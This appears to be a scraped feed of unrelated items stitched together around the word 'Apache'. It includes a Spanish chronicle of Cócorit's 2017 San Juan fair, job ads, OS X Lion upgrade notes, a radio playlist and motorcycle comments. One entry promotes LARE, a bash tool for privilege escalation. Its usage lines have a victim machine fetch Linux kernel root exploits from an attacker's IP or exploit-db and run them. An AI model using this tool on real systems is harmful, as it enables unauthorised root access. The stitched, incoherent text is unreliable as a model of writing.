Pero como estaba cerrada para prevenir el vandalismo sufrido localmente, recurrí a la casa del Pueblo Mayor, don Antonio Quiñones, para solicitarle permiso: ¡Oh Sorpresa! Al recibir la noticia de su fallecimiento años atrás y el actual, don Aurelio Valencia Valenzuela, se encontraba laborando en la Lomita de Tajimaroa. Así que opté por platicar con las señoras María Yolanda Zazueta Sayas y María José Valenzuela Muñoz, mientras estaban sentadas  bajo la sombra de frondoso árbol yucateco; preguntándoles: ¿Cómo les fue en la “La Víspera de San Juan” este año?

-Inició a las 9 de la noche con las danzas del Venado y de la Pajkola en esa ramada y los Matachines en la iglesia; se sacó “El Torito” con cohetes y hubo mucha comida con guacabaqui, frijol con carne, pozole, menudo y tortillas de harina.-

-Vinieron 15 Pajkolas y un venado con sus músicos de la Colonia Militar; 20 Matachines de Tajimaroa; el “Maistro” y cantoras para los rezos de Vícam Pueblo (Sacerdote y señoras que cantan en latín antiguo y en la lengua) y unas 30 personas de por aquí. Hoy, a la salida del sol y después de los rezos sacaron al Santo de la iglesia cruzando por ahí hasta el canal (“Porfirito”) para bañarlo en una tina, cuando antes lo metían en el, pero ya no, al estar recubierto con losa.-  (de concreto)

¿Fue bañado? Les pregunté con extrañeza: -Se dice así, pero fue bautizado con agua en mano en forma de cruz y lo regresaron al altar rezando y después bailaron los Matachines: Para las 9 o 10 de la mañana todo acabó y hasta los trastes fueron lavados: ¡Se están perdiendo las tradiciones!- Comentó, lamentándose María José.

Fue entonces cuando realicé garrafal error en la anterior crónica al referir sacar “Torito de San Juan para bañarlo en el canal” sin ser correcto. Sacan la imagen de San Juan Bautista del altar y el “Torito” es una figura pirotécnica.

Caminé rumbo al barrio antiguo de “La Bomba”, refugio contra ataques yaquis, por el  bordo del canal Porfirio Díaz construido a partir de 1890 contemplando magníficos paisajes de arboledas, campos agrícola, puentes y la arquitectura vernácula mexicana, legado de la Comisión Científica de Sonora porfiriana.

Me desviaba un poco por las calles terregosas de este singular barrio formado entre 1922-1925 por yaquis pacíficos denominados “Mansos”, quienes lo abandonaron por los levantamientos en armas de 1926 y 1929 contra el gobierno federal y como no quisieron radicar en él como peonada yori (no yaqui) emigraron como el pueblo judío para hacer tribu  en Torocoba, Guamuchilito y Loma de Guamúchil en 1948.

Crucé un puente peatonal y encaminé a la plaza Ignacio Zaragoza  por la calle Hidalgo mirando de soslayo la escuela Cámara Junior amenazada por la extinción para privatizar este espacio público por la gentrificación neo global de los cocoreños dueños de la colonia Centro, el cambio al formato de la “Feria de San Juan de Cócorit” y junto a una ceiba, el re encuentro con la hermosa ex reina de la Feria de San Juan 2012, Yessenia Carolina Ferreira, convertida en toda una pasante de la licenciatura de Psicología escribiendo su tesis profesional y deseo de trabajar con la niñez especial de Ciudad Obregón.

Por su hermosura cocoreña la posé en diferentes escenarios de la feria: Los juegos mecánicos situados sobre la calle Yáñez muy disfrutados por infantes y autos estacionados obstaculizando el acceso al atrio de la parroquia Nuestra Señora de Guadalupe. Por la banqueta de la plaza, una veintena de puestos de variada vendimia de comida hasta la barda de la cancha; por el andador principal al moderno kiosco, puestos de bisutería por el grupo Toki.

En el jardín y sobre raíces de una ceiba, la exhibición de pintura paisajista y danzantes venados de Francisco Ayón Tolano, veterano del arte cajemense, asistido por su esposa Dolores Báez; frente al tronco de “Espíritu Santo de Cócorit”, el tallador de madera, Francisco, mostrando su artesanía y una vivienda “Wigam” Apache,  recordándome las incursiones de Jerónimo y Mangas Coloradas al estado.

A falta de información no se pudo apreciar la peregrinación católica yori con diferente imagen modernizada de San Juan Bautista llevada a cabo por el padre Raymundo Mesa, acólitos de la parroquia de Nuestra Señora de Guadalupe, la reina Teresita de Jesús y escasa grey católica. Al darnos cuenta de ella, se encontraban rezando en la orilla del canal “Porfirito”, continuando hasta el puente de la calle Juárez cruzándolo hasta la calle Argentina y doblando enfrente de la Comisaría  y terminar frente al atrio sin poder entrar al recinto por había misa de boda y los Matachines yaquis nunca aparecieron por regresar a su pueblo de Tajimaroa.

Fe de errata: En la pasada crónica aludí que esta peregrinación católica la querían hacer tipo folclórica mexicana: Error al confundirla con la efectuada entre esta parroquia y la iglesia del Espíritu Santo del barrio de El Conti en años anteriores.

En el atrio se pudo platicar con su majestad Teresita de Jesús  Zavala Méndez, bella reina de la Feria de San Juan de Cócorit 2017, orgullosamente cocoreña coronada durante el baile gratuito para el pueblo en la cancha deportiva y reconocida cantante de música ranchera y banda sinaloense  logrando primeros y terceros lugares en los Concursos Culturales Inter CECyTES Nivel Regional en Hermosillo y audiciones de la Voz México-2015.

Fue muy acertado usar el kiosco como escenografía para el Teatro del Pueblo, actuando el cantante Benito Rojas y los grupos Entre Danza y Santos Estudio, con coreografías folclóricas mexicanas  y modernas siendo muy aplaudidos por unas 250-300 personas y familiares gozando el espectáculo coordinado por  Miguel Ortiz.

En la ramada cocina tradicional iconográfica de la arquitectura yaqui, degusté sabrosa tortilla de harina sobaquera sacada del comal por la señora Reyna, presidenta de la asociación civil Cócorit Tradición y Cultura, mientras vendían burritos de carne machaca y de frijol a los visitantes: unas de ellas exclamaron la rareza de tantos pájaros pintados y reprobaron el búho sobre la bella fachada de la residencia Robinson Bours frente a la plaza.

¡Qué hermosos caballos! Exclamé al admirar la exposición de pintura equina del artista Tolstoy Aguilera Guerrero mostrada por la señora Martha Murguía, gerente  de la Casa de Adobe, e invitándome a degustar sabrosas chimichangas con carne machaca muy apreciada por comensales del restaurante Los Chanates.  Fue grato saber que fue seleccionada en el programa “Sonorenses de a 100” por la gobernadora Claudia Pavlovich que fueron enviados a la ciudad de Washington.

Antes de regresar a la ex ciudad Cajeme cientos de personas llegaban para gozar el baile sabatino amenizado por la banda Tropicalísimo Apache.

Lamento decir que se miró mucha desunión, apatía y rencores entre los culturistas locales: Por un lado, los neo cocoreños acaudalados promoviendo que los festejos nativos sean fuera de la plaza y de la calle Tichi Muñoz, remodelarla y privatizarla para uso promocional culturero dirigido al turismo norteamericano.

Por el otro lado norte, los oriundos tradicionalistas y antiguos residentes que quieren usar su plaza, exigiendo respeto para la cultura nativa y su derecho a un entretenimiento acorde a las costumbres de Cócorit pueblo Viejo; la conservación, protección y difusión de su patrimonio cultural tangible y edificado para beneficio de la comunidad. Unos otros,  decenas de apáticos que no les gusta nada.

Tanto alarde promocional que se le hace a la Comisaría de Cócorit para su candidatura a Pueblo Mágico de México ya rechazado por el gobierno federal y no se vieron  por  Feria de San Juan, la gobernadora Claudia Pavlovich con su numeroso séquito de funcionarios, prensa y servidumbre; el Instituto Sonorense de Cultura hermosillense; el alcalde Faustino Félix con su cabildo y burocracia; la Dirección de Cultura Municipal; universidades o tecnológicos; las asociaciones civiles, Fundación Cócorit, Centro Cultural Cócorit, el Museo de los Yaquis y demás empresa culturales que obtienen apoyos de miles de pesos para la cultura, abandonando a la comisaria y su comitiva en perjuicio de la fiesta tradicional anual del pueblo de Cócorit: ¡No se vale!

Pero les salió el tiro por la culata ya que tuvieron éxito por la asistencia de cientos de personas que disfrutaron la kermes en la plaza y los bailes gruperos.

También se escuchó el lamento de muchas personas adultas añorando la pasada Feria Agrícola, Ganadera, Industrial de San Juan de Cócorit de los años 1960 con artistas nacionales y entretenimiento, cuando la organizaba la Cámara Junior de Cócorit y construyó la escuela primaria en 1967: Medio siglo después, sus remanentes no activos como Cámara Junior, avalan su demolición y erradicarla de la plaza para ubicar a sus 300 niños pobres en un despreciable y paupérrimo ambiente de pobreza extrema en la periferia agrícola con agroquímicos del  Pueblo Viejo de Cócorit  perjudicando a la niñez en edad escolar primaria. ¡Discriminación social típica de Ciudad Obregón, Sonora, avalada por la Secretaría de Educación y Cultura y la Comisión de Fomento al Turismo del Estado de Sonora. ¡Qué Horror!


La Feria de San Juan de Cócorit 2017


Señora María Yolanda Zazueta Sayas cargando a San Juan Bautista en su día festivo.

Explanada llamada Conti, espacio religioso yaqui.

Iglesia del Espíritu Santo del barrio de El Conti, Cócorit

Canal “Porfirito” con sus extraordinarios paisajes naturalistas del porfiriato. Aquí se baña a San Juan Bautista.

Su graciosa majestad Teresita de Jesús Zavala Méndez, bella reina de la Feria de San Juan de Cócorit 2017.

Su majestad Teresita de Jesús  Zavala Méndez, bella reina de la Feria de San Juan de Cócorit 2017.

Yessenia Carolina Ferreira, hermosa psicóloga y reina de la Feria de San Juan de Cócorit 2012.

Yessenia Carolina Ferreira en el kiosco moderno de la plaza.

Yessenia Carolina Ferreira apreciando el arte de Ayón.

La ex reina 2012  curioseando con la artesanía apache de Francisco

Yessenia Carolina torteando en la cocina de Cócorit Tradición y Cultura, A.C. 

Francisco mostrando su talla de Cócorit del Espíritu Santo a Yessenia Carolina.

Francisco Ayón Tolano, veterano del arte cajemense y esposa Dolores Báez.

Coreografía veracruzana por Ente Ballet de Cajeme.

Encantadora bailarina con vela en la cabeza.

Fotografía  por Francisco Sánchez López. ¡No me las roben!

Material protegido por derechos de autor SEP-509989-78 del titular Arq. Francisco Sánchez López. Se prohíbe la reproducción de este artículo y fotografías. Se requiere la autorización escrita por el autor. ¡Di No a la Piratería!

Arquitecto, Fotógrafo, Artista del Arte del Realismo Mágico, Ecologista protector de ballenas en el mar de Cortés,  Periodista Cultural en crónicas y críticas de arte en el suplemento Quehacer Cultural del periódico El Diario del Yaqui de Ciudad Obregón, Sonora, México.

Material protected by copyright SEP-509989-78 of his holder Arch. Francisco Sánchez López. Reproduction of this article and photography is required a written permission by the author. Say No to Piracy!

Architect, Photographer, Artist of Magical Realism art, Ecologist in the Sea of Cortes´ whales protection. Cultural Journalist in art chronicles and critics for the Cultural Affairs supplement, El Diario del Yaqui newspaper in Ciudad Obregon, Sonora.

Revista Virtual:www.arkisanchez.wordpress.com, Inscrita en la Red de Revistas Electrónicas de Arte y Cultura de CONACULTA en 2014. Facebook: Francisco Sanchez; T: @archfcosanchez



          LARE - [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits   
[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine do not have internet connectivity.
The script is useful in a scenario where your victim machine do not have an internet connection (eg.) while you pivot into internal networks or playing CTFs which uses VPN to connect to there closed labs (eg.) hackthebox.gr or even in OSCP labs. The script uses Local root exploits for Linux Kernel 2.6-4.8
This script is inspired by Nilotpal Biswas's Auto Root Exploit Tool

Usage:


1- Attacking Victimin Closed Network
You have to first set the exploit arsenal on the attacking machine and start the apache2 instatnce using the following command. bash LARE.sh -a or ./LARE.sh -a


Once done with it, You have to copy the script to the victim machine via any means (wget, ftp, curl etc). and run the Exploiter locally with the following command: bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]



2- Attacking Victim with Internet Acess
In this scenario the script is to be ran on the victims machine and it will get the exploits from the exploit-db's github repository and use it for exploitation directly. This is the original fuctionality of Auto Root Exploit Tool with some fine tunning done. Run the Exploiter with the following command: bash LARE.sh -l or ./LARE.sh -l


Note
The script runs multiple kernal exploits on the machine which can result in unstability of the system, it is highly recommended to uses it as the last resort and in a non-production environment.


Download LARE

          The Afternoon Sound Alternative 06-29-2017 with Marco Mangione   
Playlist:

Gramatik- Just Jammin - SB2
Jurassic 5- A Day At The Races - Power In Numbers
various Artists- Stylissimo Dj Illegal - Strickly Bboy Beats
MASAKI YODA- Dont Stop It - Carrying The Future
Incredible Bongo Band- Apache Grandmaster Flash Remix - Bongo Rock
- voicebreak -
The Haggis Horns- Naughty Buddha - Hot Damn
Dj Diles Feat Molina- Punjabi Mc Jayz Beware Of The Boyz - Mixtape
Rahat Fateh Ali Khan Shreya Ghoshal- Singh Is Kinng feat Snoop Dogg - Singh Is Kinng Original Motion Picture Soundtrack
- voicebreak -
Sunidhi Chauhan- Honeymoon Ki Raat - The Dirty Picture Original Motion Picture Soundtrack EP
Jackie V- Om Shanti Om Medley Mix - Om Shanti Om Original Motion Picture Soundtrack
Mika Singh SachinJigar Monali Thakur- Hip Hop Pammi From Ramaiya Vastavaiya - Best Of 2013 Block Buster Hits
Raghav Mathur Shilpa Rao- Ishq Shava - Jab Tak Hai Jaan Original Motion Picture Soundtrack
- voicebreak -
Sonu Nigam Shreya Ghoshal- Zoobi Doobi From 3 Idiots - Best Of Bebo
The Spy From Cairo- Road To Ryhad - Arabadub
Bush Chemists- New Stylee - Raw Raw Dub
- voicebreak -
HIRIE- Dont Take My Ganja - Wandering Soul
Nattali Rize Julian Marley- Natty Rides Again - Natty Rides Again Single
Morgan Heritage- Dream Girl - Avrakedabra
- voicebreak -
Toots The Maytals- Get Up Stand Up - Toots The Maytals Time Tough The Anthology
Charleston Okafor- America - America
CULTURE- Legalization - Payday
10 Ft Ganja Plant- Burning James - Bass Chalice
- voicebreak -
Rico Rodriguez- Africa Vocal Version - Man From Wareika
Nightmares On Wax- You Wish - In A Space Outta Sound
Underground Resistance- The Stangler - Attac Un Autre Monde Est Possible
DJ Dolores- A Espuma Dos Dias - Aparelhagem
- voicebreak -
Balkan Beat Box- Ill Watch Myself - Shout It Out
Aziza A- Sonsuzluk - Kendi Dunyam
Acid Arab- Sayarat 303 - Musique De France
Thunderball- The Road To Benares - Cinescope
- voicebreak -
The Sound Defects- Aint Right - The Iron Horse
Run The Jewels- Thieves - Rtj3
Ohmega Watts- Yo - Pieces Of A Dream Instrumentals Instrumental
- voicebreak -
George Clinton- Summer Swim - TAPOAFOM The Awesome Power Of A Fully Operational Mothership feat Belita Woods


playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/50/playlistDate/2017-06-29
          Measuring nginx's efficiency (8 replies)   
Hello,

with your help I managed to configure nginx and our website now can be
accessed both - through apache and nginx.

Now, how can I prove to my boss that nginx is more efficient than apache
to switch to it? How do I measure its performance and compare it to that
of apache? Which tools would you recommend?

Thank you in advance!

_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
          Full-Stack Web Developer DevOps Software Engineer Python Agile Trading / Joseph Harry Ltd / New York, NY   
Joseph Harry Ltd/New York, NY

Full-Stack Web Developer (Software Engineer Python Apache Tom Cat IIS DevOps ChatOps Microservices CI CD Bamboo BitBucket ClojureScript Docker Chef Jenkins Agile Digital Trading Banking) required by our trading software client in New York City, New York.

You MUST have the following:

Good experience as a full-stack Software Engineer/Developer for web applications; this can be any language including .NET, Java, PHP, C++, Python

HTML 5, CSS 3, JavaScript for Front End development

An interest in learning Python

Web Servers such as IIS, Tom Cat or Apache

Agile

The following would be DESIRABLE, not essential:

BitBucket

Microservices or Domain Driven Design (DDD)

ClojureScript

Docker

ChatOps

Contribution to the open-source community- GitHub, Stack Overflow

Continuous integration (Bamboo/Hudson, TeamCity, TFS, MSBuild)

Automated deployment (Chef, Ansible, Octopus)

Configuration management (Puppet, PowerShell DSC)

Role:

Full-Stack Web Developer/Software Engineer required by my trading software client in New York City, New York. You will join a small Agile team of five developers, spread over the US and Europe, that are extending and improving credit and counterparty risk applications. There will be the continuous development of new features in order to incorporate the constant release of financial regulation into the product suite. The suite is web based, built in Python and running on Apache, Tom Cat and MySQL. Although this role will be exclusively developing in Python, Python experience is not required. You can have experience in .NET, Java, PHP, C++ or other languages as long as you are happy to work with Python and have web development experience.

In order to incorporate new financial regulation, the team adopts a highly Agile DevOps environment. This results in several releases a day with the use of Bamboo, BitBucket and Confluence for continuous integration, deployment and source control.

The environment is modern and progressive. There will be excellent opportunities to progress in to Lead Developer and Architect roles.

Salary: $100k - £125k + Bonus + Benefits

Employment Type: Permanent
Work Hours: Full Time
Other Pay Info: $100k - $125k + Bonus + 401K

Apply To Job
          Senior FullStack PHP Developer / ISL Recruitment / Bristol, Somerset, United Kingdom   
ISL Recruitment/Bristol, Somerset, United Kingdom

Senior FullStack PHP Developer

Bristol; up to £35,000 + Flexible working

ISL Recruitment is working with a very successful digital agency with a global presence. They have very cool offices in central Bristol and offer one of the best benefit packages in Bristol!

My client is looking to bring on board a Senior Full-Stack PHP Developer to join a team of 2 Developers. This is fast paced environment, you will have the opportunity to learn the latest tech on the market.

As the Full-stack Senior PHP Developer you will be experienced with:

*Object-oriented PHP

*MySQL

*HTML/CSS

*JavaScript (jQuery)

*Good knowledge of Twig (or similar template engine)

*LESS/SASS

*GIT

*Experience of developing sites with WordPress (and other open-source Content Management Systems)

*Experience of Apache/Nginx and Linux server administration

You will be self-motivated and personable as there will be some client interaction, naturally you will also be very organised. You will also be able to accurately estimate project timeframes.

In addition to the above tech if you have any experience with the below this will be beneficial, if not you will have the opportunity to learn!

*Umbraco

*SharePoint

*SEO

*PSR-2 coding style

*MVC design pattern

My client are offering a salary of £30,000 - £35,000 and the benefits include flexible working hours, pension, health and well being incentives, cycle to work, interest free tech loans to name a few!

If you like the sound of this then please get in touch today! Roxy Grey (see below)

Senior FullStack PHP Developer

Bristol; up to £35,000 + Flexible working

ISL (Incite Solutions Ltd) is acting as an Employment Agency in relation to this vacancy.

Employment Type: Permanent

Pay: 30,000 to 35,000 GBP (British Pound)
Pay Period: Annual

Apply To Job
          PHP Web Developer - PHP / Lynx Recruitment Ltd / Skelmersdale, Lancashire, United Kingdom   
Lynx Recruitment Ltd/Skelmersdale, Lancashire, United Kingdom

PHP Web Developer - PHP - Skelmersdale - £25,000

I am looking for a Web developer for a Facilities Services company I am working with in Lancashire. one of the UK's number one provider of essential workplace products and services for small businesses. Valuing helpfulness, reliability and innovation within their employee base, and believe in giving everyone the freedom to do what they do best.

Working closely with the digital team you will be use your ability to manage your personal goals, as well as achieve team objectives. Ideally the candidate will need to have at least 1 to 2 years experience.

Skills -

PHP 5/7 OOP

MySQL Database and SQL syntax

SSH

Apache Webserver

To understand development design patterns

Understand HTML and CSS

Strong Numeral Skills

Experience with a Linux server environment

Experience with any PHP Frameworks

Composer experience

Responsibilities -

Communication is key, to be able to establish briefs from internal and external teams.

Deliver web initiatives to high stand, whilst meeting project deadlines.

communicate and enforce best practices to ensure the consistent delivery of high quality services and systems.

Ensure projects are tested in difference scenarios to achieve fully functioning systems and websites

Be innovative with ideas to progress the team and company.

Communicate professionally with internal and external stakeholders by telephone, email and face to face, building positive relationships, responding to and progressing issues to a successful conclusion.

Conscious attempts at improving the internal systems

Working alongside a team to achieve the companies standards and goals

If this is something you would be interested in or know someone that would be then please feel free to apply now

Employment Type: Permanent

Apply To Job
          Web Developer - Wimborne - £25k - £35k / Spectrum IT Recruitment (South) Ltd / Wimborne, Dorset, United Kingdom   
Spectrum IT Recruitment (South) Ltd/Wimborne, Dorset, United Kingdom

Web Developer

Wimborne, Dorset

OOP, PHP5+, MySQL, LAMP, HTML, CSS, JavaScript, JQuery

Salary £25,000 - £35,000 plus benefits, training and career progression

My client are a very successful digital design and development agency and due to growth within the business are currently seeking a web developer who is happy to do both hands-on coding and development whilst being proactive on both client and customer related projects.

Working within a team of technically advanced web developers you will help with assisting in client and customer meetings, scoping requirements and help shape projects from requirements capture through to release. You will be familiar with SASS and source control such as GIT. You will also be happy using JavaScript frameworks, integrating PHP and optimising for page speed and SEO.

Key Skills:

HTML

CSS

JavaScript

JQuery

Bootstrap

LESS/SASS

MVC

PHP

MySQL

Apache

Linux/Windows

My client can offer a great working environment with a benefits package which includes regular training and personal development as well as flexible working hours. You'll have the opportunity to input into the business and processes with regular innovation sessions.

Candidates must be able to provide some code examples upon request.

If you would like to be considered for this fantastic opportunity then please send your CV across to me or email (see below)

Employment Type: Permanent

Pay: 25,000 to 35,000 GBP (British Pound)
Pay Period: Annual
Other Pay Info: training and benefits

Apply To Job
          PHP Developer / ARC IT Recruitment / Woking, Surrey, United Kingdom   
ARC IT Recruitment/Woking, Surrey, United Kingdom

PHP Developer, Web Developer

Woking

Up to £40,000 PA DOE

PHP Developer, Web Developer is required for a creative digital agency based in Woking.

This PHP Developer, Web Developer position role will see you working with a number of high profile, important clients to input into the development, creation and maintenance of varied projects.

Skills Required -

Proven commercial experience within a PHP development role

Commercial experience using LAMP (Linux, Apache, MySQL, PHP)

Understanding of Scrum or Agile work flow

Experience using PHP framework Laravel

You will be joining a truly exceptional digital agency in this instance. Our client has gained a number of fantastic clients and is looking to expand further.

To apply for this opportunity please send your CV and portfolio to Ellis McWilton at Arc IT Recruitment.

PHP, Developer, JavaScript, LAMP, Laravel, GIT.

Employment Type: Permanent

Pay: 30,000 to 40,000 GBP (British Pound)
Pay Period: Annual
Other Pay Info: Benefits

Apply To Job
          OS X 10.7 Lion and Lion Server Upgrade Notes   

In this post I will share my notes on the upgrade from OS X 10.6 "Snow Leopard" to 10.7 "Lion". This is not meant to be a comprehensive review but I hope someone can find some benefit in this information. I am an early adopter in most cases and a software lover (fanatic or addict might be a more appropriate adjective!), so I bit the bullet for this upgrade as soon as I could get it, knowing that I would be in for some trouble here or there. As for my background, I am a technologist mostly on the management side these days but do have a clue, and since I am not doing OS X or iOS development nor did I have time to read too much about Lion before the release, these notes represent fairly fresh eyes on the product.

Generally, my upgrade from 10.6.8 to 10.7.0 went smoothly and without trouble. Developers of the software I use were on the ball, and had apps ready for Lion either off their sites or in the Apple App Store. Kudos to them and to Apple for all the hard work. Make no mistake, software is truly hard work, and to make things appear easy and to "just work", like Apple often does, requires massive effort. If it looks easy, the guts of it are hard, in the world of software. There are no magic wands, although it might appear that way.

OS X 10.7 Lion

I thought the download would take forever, but it was relatively quick after making the payment in the App Store. I feel the low price is more than fair; generous even, given the value provided. I did two systems: my home system and my work system, paying for those separately. The morning download at about 7AM JST was fast, while the late afternoon download at the office was slower. Either way, it is a 4GB download.

I retrieved the file that had downloaded to the /Applications folder, before I clicked "Install", for safekeeping, and copied it to a USB stick. There is a way to convert a USB to a bootable disk to use for reinstallation, so I will revisit and do that later.

After clicking Install, the time to install was similar to past experiences with OS X upgrades. Breakfast eaten and paper read, I went back to look, and the system had rebooted into a login screen with a nice-looking "textile" background; very attractive. I used my usual account to log in, and after some grinding of gears (caches and such being created I imagine), everything pretty much came up as expected.

After the install and logging in, my first impression was that this release is a definite paradigm shift towards a more iOS like experience on OS X, given features like Launchpad and Mission Control. These take over a bit of the market share for small development houses making utilities to do a similar thing albeit in a more advanced manner. QuickSilver, LaunchBar and Spaces come to mind.

Some apps do conversions the first time you start them, like Mail and maybe Calendar. This takes a while especially if you have a massive amount of data stored.

Spotlight re-indexed after the first reboot, causing a temporary loss of Spotlight search and, full text search within Mail, for example, while the index process grinds away. Spotlight has been glitchy in the past for me, but this time "it just worked."

Lion has a monochrome palette, looking at the mostly-grey icons in Mail, Finder and Safari. Colorful icons are still present in the Launchpad and Mission Control apps. Then there are the iCal and Address Book apps which look out of character, looking like the objects they represent: iCal like a physical calendar complete with a torn paper edge and Address Book looking like an old-fashioned scheduler portfolio. They look good, but a bit out of place when compared with Mail, Finder or Safari.

Mail.app has really matured well with the Lion release, and has sharp-looking grey-on-grey icons. The problem for me is, I like to rely on color as a visual clue for speed while I work. I suppose one way of looking at it is, there are few distractions from the task at hand, and the monochromality of certain apps make it easy to concentrate on the work being done rather than on colorful icons.

Two of the key new-to-Lion features, LaunchPad and Mission Control, are very iOS-like and easy to use. For instance, to get into Mission Control, which lets you administer and move between spaces, you swipe four fingers upward on the trackpad. This is assuming you have one either on a Laptop like a MacBook Pro, or a Magic Trackpad, but I think we are in the middle of a bootstrap to make OS X very much a touch-centric OS.

An example of a really large "who moved my cheese" moment, and whopping big paradigm shift, is the scroll bars or lack thereof. Lion has the ability to allow any app that is programmed to take advantage of it, to run full screen. This looks fantastic, in apps like Mail, Safari, and even the Mars Edit edtor I am using to write this post. Further, the scroll bars do not appear by default a la iPhone and iPad (i.e., iOS), giving a very clean look to Lion apps, in general. Despite the relative hysteria over this predictable Apple shift (I mean, how many times have they done it in the past?), I am not finding it to be a problem at all. You just swipe two fingers on the trackpad to scroll, or for the trackpad-deficient, you can nudge your scroll button on your mouse. If you jiggle the trackpad with two fingers for instance, the scrollbars appear, and you can then drag-scroll as before and always.

The concept of scrolling itself has changed too, and this takes a bit of getting used to. On a tablet or phone, the touch paradigm means you push or pull the objects in the direction of the movement of your fingers, swiping and pinching. However, this is the opposite of what you might be used to, where pulling down on a scroll bar moves content up. With a touch device, this is the opposite, and so it is with OS X Lion. You pull or push the object (document, list, etc) with your fingers on the trackpad.

Safari has a neat visual indicator of download progress, to the right of the address bar.

Suspending with Option-Command-Eject is faster than ever. Where Snow Leopard was taking ages to go silent, Lion goes to sleep immediately. Perhaps this is due to all the various improvements in automatic file saving and caching?

After restarting a program, Lion remembers the exact state of it, and reopens the program how you left it. If you had 10 text files open, it will open them all back up the next time. I can see this might be annoying, but, it is really nice in many cases.

So far, I really like Lion. As I observe more, I will update this post.

Updates 24 July 2011

When you cmd-click a link in Safari, it now does the right thing and opens the tab next to what you were looking at, instead of way, way over in right field. I like it.

If you use Path Finder, note that it messes with Mission Control. I am not sure what I need to do yet, but I had to keep searching for the open Path Finder window in its Windows menu.

The upper-right hand "lozenge" icon is gone, having been replaced by the full screen icon. It was useful to quickly cycle between different views of the icon bar in any given application, if you option-click it. RIP.

The stop light icons in the upper left of any window seem to function the same, but they are smaller and daintier.

Pressing option while clicking a menu still works to bring up hidden options.

A lot of text-to-speech voices were added and are available as optional downloads. Check out the Speech preferences panel.

Updates 3 Aug 2011

Finally, a security basic has been improved, in that you can easily set your mac to lock after screen inactivity or screensaver activity. System Preferences, Security and Privacy, General.

An irritation is, Lion spell-checks everything everywhere automatically, making it a bit difficult to type, sometimes. It is the iOS paradigm for sure. You can toggle this in System Preferences, Language and Text, Text, Correct Spelling Automatically. It requires a restart.

 

OS X 10.7 Lion Server

Luckily, my firm was not making use of too many of the features of Snow Leopard Server, or this upgrade would have been really painful. When I upgraded to Lion Server, a lot of stuff just broke, unfortunately, but more on that below.

When you go to buy Lion Server from the App Store, you are told that both programs need to be purchased, and it is just as easy as the client to install. XCode and the Lion Server Administration tools are available as separate downloads. When you download XCode, despite the fact that it is put into /Applications, you still need fo find and run the XCode install program.

You can still use Workgroup Manager and the Server Admin app, but Lion presents the Server app as the primary admin tool. The problem with this is, the Server app is overly simplistic. Where as Server Admin had many settings, Server.app has only 1 or 2 per service, and not all services came through the upgrade unscathed.

My firm was primarily using Open Directory, Apache, Wiki, Mail, MySQL, and some development tools on our Snow Leopard server. Some problems occurred with each:

Open Directory - some user IDs broke and I had to recreate them.

Mail Server - Lion is still using postfix, but, the upgrade broke our aliases in /etc/aliases. When I told postfix how to find the aliases file, in main.cf, mail started to flow again. That being said, there is nowhere to add virtual domains and so on and so forth, like you could do with Snow Leopard Server.

Apache - the virual hosts settings do not work, and I lost a whole range of websites in this. Virtual Hosting is the most basic thing, so it was a shame that Apple could not get this one right.

Wiki - the wiki is now being served out of the postgresql database (user collab, db collab), instead of out of the Collaboration folder. Further, the looks have been generified so you no longer have the ability to customize each wiki. However, I would say the usability of the wiki went up considerably from an editor standpoint. We still cannot edit the Wiki pages using an iPad.

MySQL - is no more, though I imagine you can install it some how. Lion server comes with PostGreSQL rather than MySQL but there is no GUI for it at all. You are stuck with psql or perhaps Tuples.app.

My feeling is, Apple are aiming Lion Server at the SMB market, and shutting out businesses that really want to push the envelope on Lion Server.

If that is the case, is it not strange to have so many troubles upgrading, or to have no easy way to back up the wiki, without hiring a tech to assist.

Updates 3 Aug 2011

Setting up notifications on the wiki was difficult, because apparently the wiki recognizes only its own hostname. Perhaps I misunderstood something, but for me, entering preferred addresses for each user did not work. I had to use username@my.host.name.com and set up a .forward file in each home folder. Definitely not something for the uninitiated.

 

In Conclusion

I will add more as I discover. Hope this was helpful.

 


          Comment on Bajaj Pulsar NS 160 vs TVS Apache RTR 160 by Bajaj Pulsar NS 160 Launch Date, Price, Mileage, Specifications, Images   
[…] Also See – Bajaj Pulsar NS 160 vs Pulsar NS 200 | Bajaj Pulsar NS 160 vs TVS Apache RTR 160 […]
          Comment on Bajaj Pulsar NS 160 vs TVS Apache RTR 160 by Compare Bajaj Pulsar NS 160 vs Pulsar NS 200 - Price, Mileage, Specs   
[…] Also See – Bajaj Pulsar NS 160 vs TVS Apache RTR 160 […]
          Comment on Bajaj Pulsar NS 160 Launch Soon! by Compare Bajaj Pulsar NS 160 vs TVS Apache RTR 160 - Price, Specs   
[…] first-ever 160cc motorcycle to go on sale under the Pulsar moniker. Also, from the looks of it, the NS 160 is target squarely the TVS Apache RTR 160. The Apache offers a grunty motor, decent road handling […]
          Comment on 2017 TVS Apache RTR 160 – All You Need to Know! by Compare Bajaj Pulsar NS 160 vs TVS Apache RTR 160 - Price, Specs   
[…] go on sale under the Pulsar moniker. Also, from the looks of it, the NS 160 is target squarely the TVS Apache RTR 160. The Apache offers a grunty motor, decent road handling and sharp looks. In comparison, the NS 160, […]
          Comment on List of Upcoming New Bajaj Pulsar Bikes In India by Compare Bajaj Pulsar NS 160 vs TVS Apache RTR 160 - Price, Specs   
[…] the all-new Bajaj Pulsar NS 160 is close to its launch and the upcoming Bajaj Pulsar model will soon become the first-ever 160cc motorcycle to go on sale under the Pulsar moniker. […]
          Premieră militară: un laser de mare putere a fost instalat la bordul unui elicopter și utilizat, cu succes, contra unei ținte. Cât de eficiente sunt armele laser, în prezent?   
